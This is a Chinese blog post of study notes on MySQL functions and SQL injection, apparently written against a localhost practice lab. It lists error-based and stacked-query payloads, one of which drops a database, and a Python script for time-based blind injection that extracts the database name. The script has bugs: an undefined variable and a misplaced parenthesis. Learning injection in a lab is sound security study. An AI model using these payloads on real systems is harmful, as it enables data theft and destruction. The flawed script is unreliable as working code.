mysql常见函数及渗透

已于 2023-04-28 22:38:31 修改
阅读量71 收藏
点赞数
文章标签: sql 数据库
于 2023-04-10 22:29:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huazaijake/article/details/130071085
版权

select database() -- 当前数据库名

select table_name from information_schema.tables where table_schema='mydatabase123'
select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.columns limit 2;

sleep(n) --睡眠n秒

substr(str,start,len) -- 截取mid()、left(str,len)

count(0) -- 统计条数

ascii(str) -- 返回字符ASCII码ord()

length() -- 长度

rand() -- 随机数 rand(0)伪随机

floor(x) -- 向下取整,小于x的整数

 extractValue('<a href="sss"></a><a href="2333"></a>','/a!123qwer!@#') -- xpath 解析

Boolean-Base布尔型注入

Union 联合查询注入

Time-Based 基于时间延迟注入

select * from tb_goods where category='Phone-ele' and sleep(2)

Error-Based 报错型注入 floor()、updatexml()、extractvalue()

SELECT extractValue('<a href="sss"></a><a href="2333"></a>','/a~!123qwer!@#');
SELECT updatexml('<a href="sss"></a><a href="2333"></a>','/a:~12345','newValue');
select count(*),concat((select user()),'===',floor(rand(0)*2))x from information_schema.tables group by x ;

Stacked queries 叠堆注入

select * from user; drop database testdb; #

# python

import requests
import time

HEADER = {
    "Cookie": "PSE......"
}

BASE_URL = "http://localhost:8080/sqli_15.php"

# 获取数据库长度
def get_database_name_length() -> int:
    count = 0
    for i in range(100):
        url = BASE_URL + "titile=Java' and length(database())={} and sleep(2) -- &action=search".format(i)
        start_time = time.time()
        requests.get(url, headers=HEADER )
        if time.time() - start_time  > 1:
            print("长度:{}".format(i) )
            count = i
    return count 

# 获取数据库名称
def get_database_name(count):
    data = []
    for i in range(count+1):
        for j in range(33, 127):
            url = BASE_URL + "titile=Java' and ascii(substr(database(),{},1)={} and sleep(2) -- &action=search".format(i, j)
            requests.get(url, headers=HEADER )
            if time.time() - start_time  > 1:
                print( chr(j) ) 
                data.append( chr(j) )
    print(data)
    print(''.join(data))

# MAIN入口
if __name__ == '__main__':
    get_database_name(get_database_name_length())

mysql备份表testdb.products

mysqldump -uroot -p testdb products > /tmp/aaa.sql

全库备份

mysqldump -uroot -p -A -R -E --triggers --master-data=2 --single-transaction > /tmp/myfull.sql

mysql恢复表testdb.products

mysql> source /tmp/aaa.sql;

e2c2c74b20384654ae9d89fa9163b78a.jpg

84310ff608d64ac8ae2ab8e8e9597d34.jpg 

025b6c05c5c8411f9814759055c4560f.jpg 

df23fb226ff44bab97622888ab7092ad.jpg 

43f06f78c1f14448841e0192905719a2.jpg 

1d19fb17643c4d51af4129e42f58a451.jpg 

e1f964dee2204fdabb2826c859af0453.jpg 

067e4523f9984feb82dadd07ce195c64.jpg 

 

 

TODO... 持续更新中

 

花无缺000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
mysql数据库常用函数渗透测试专用)
Thunderclap的博客
08-24 397
如下函数渗透测试时,Mysql数据库中常用的一些函数以及内置函数。 常用函数 length() //返回字符串长度 substr() //截取字符串长度 ascii() //返回ASCII码 ord() //返回字符串第一个字符的ascii值 rand() //返回0和1之间的一个随机数 he.
Mysql数据库渗透及漏洞利用总结
m0_65716564的博客
08-25 7216
​ 创建执行命令形式的shell,但前提是对方未关闭系统函数。Somd5.com是后面出现的一个免费破解网站,每次破解需要手工选择图形码进行破解,速度快,效果好,只是每次只能破解一个,而且破解一次后需要重新输入验证码...
mysql渗透_渗透测试MySql注入(一)
weixin_39924179的博客
01-18 535
一、SQL注入条件参数用户可控:前端传递给后端的参数内容是用户可以控制的。参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库执行。二、MySQL注入知识点在mysql5.0之后默认存在一个information_schema数据库,该数据库中有三个表特别重要,分别为:SCHEMATA表、TABLES表、COLUMNS表。SCHEMATA表中SCHEMA_NAME存放该用户创建的所有数据库...
mysql常用函数及实例
qq_40945282的博客
10-16 166
一、字符函数 LENGTH #获取参数值的字节个数 SELECT LENGTH (‘lala’) ; 结果: 4 CONCAT #拼接字符串 SELECT CONCAT (‘asd’ , ‘we’ ); 结果: asdwe UPPER #将参数全部变为大写 SELECT UPPER(’ abcd’ ); 结果: ABCD LOWER # 将参数全部变为小写 SELECT L...
Mysql常用函数及应用
qdthn的博客
12-07 222
Mysql常用函数 1.1. 字符串函数 1.1.1. 插入字符 select insert(‘ring’,2,0,‘ok’); /从2的地方插入ok字符,插入时替换0个字符/ 1.1.2. 重复输出 select repeat(‘ring’,2); /重复输出字符串2次/ 1.1.3. 反轉 select REVERSE(‘ring’); /反写/ 1.1.4. 截取 select mid(‘ring’,2,2);/从某个位置取某个长度的字符/ TRUNCATE(X,D) 返回数字X,截断为D位小数。.
高级Web渗透测试工程师-Mysql注入教程.pdf
11-25
本资源为高级Web渗透测试工程师的Mysql注入教程,涵盖了Mysql的基础知识、安装、操作命令、函数、PHP mysqli链接、数据库结构对比、Mysql注入原理、读取和写入的妙用、后台手工注入及绕过、PHP的魔术引号与宽字节...
web安全渗透测试.7z
04-08
3. **lib** - 库文件,可能包含了一些常用的函数库或模块,用于支持渗透测试工具的运行。 4. **注入源码** - 包含了关于SQL注入攻击的示例代码,可以帮助理解注入攻击的工作原理和检测方法。 5. **wampserver2.5** -...
10-sql注入-mysql注入1
08-03
MySQL 4.0没有`information_schema`数据库,而在5.0及以上版本可用,这使得5.0及更高版本的数据库更容易受到信息泄露的攻击。 7. **SQLMap工具**: SQLMap是一个自动化SQL注入工具,可以用来探测、利用和清洗SQL...
黑帽渗透web安全基础.txt
06-25
44.注入常用函数.mp4 45.防火墙.mp4 46.曾删改报错注入+怎么找这种漏洞.mp4 47.其他数据库的注入.mp4 2.xss 48.什么是XSS发送ajax实现跨域.mp4 49.理解ajax同异步之学员争辩.mp4 50.存储XSS.mp4 51.反射XSS.mp4 52....
PHP+MysqlSQL注入源码 下载
11-29
MySQL是最常用的开源关系型数据库管理系统之一,而SQL注入则是一个常见的安全漏洞,通常发生在不正确过滤用户输入的情况下,导致恶意SQL命令被执行。 在压缩包文件 "6f3c3e6b84be4f4c83d65218d4e91b2a" 中,虽然...
SQL Server内置的HTAP技术
2401_85789772的博客
07-22 547
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
前台文本直接取数据库值doFieldSQL插入SQL
qq_34276316的博客
07-22 209
实现功能:根据选择的车间主任带出角色。
SQL injection UNION attacks SQL注入联合查询攻击
jamesP777的博客
07-22 276
通过使用UNION关键字,拼接新的SQL语句从而获得额外的内容,例如select a,b FROM table1 UNION select c,d FROM table2,可以一次性查询 2行数据,一行是a,b,一行是c,d。
SQL Server报告服务的艺术:在SSRS中打造专业报告
2401_85760095的博客
07-20 1043
SQL Server Reporting Services是一个全面的报告解决方案,它允许从各种数据源生成复杂的交互式和移动友好的报告。SSRS包括一个集成的开发环境,用于设计报告,以及一个部署环境,用于发布和共享报告。
【力扣】SQL题库练习5
最新发布
qq_40878316的博客
07-25 684
即按字母在字典中出现顺序对字符串排序,字典序较小则意味着排序靠前。返回结果格式如下例所示。
Sqlmap中文使用手册 - Detection模块参数使用
Reset
07-22 708
sqlmap是一款自动化检测与利用sql注入漏洞的免费开源工具。
数据库中单表的查询(select)
m0_65347933的博客
07-22 403
数据库单表查询 select
sqlalchemy使用json_unquote函数mysql like查询
ithongchou的博客
07-23 1148
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
sql注入的专项练习 sqlilabs(含代码审计)
2401_82388450的博客
07-21 713
在做题之前先复习了数据库的增删改查,然后自己用本地的环境,在自己建的库里面进行了sql语句的测试,主要是回顾了一下sql注入联合注入查询的语句和sql注入的一般做题步骤。1.获取当前数据库2.获取数据库中的表3.获取表中的字段名。
"全面介绍MySQL常用函数及示例
MySQL中常用函数合集包括字符串函数、日期函数、数学函数、条件判断函数等。在本文中,我们将主要介绍字符串函数的常用方法。字符串函数MySQL中非常重要,它们用于处理和操作文本字符串数据,例如合并字符串、截取...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值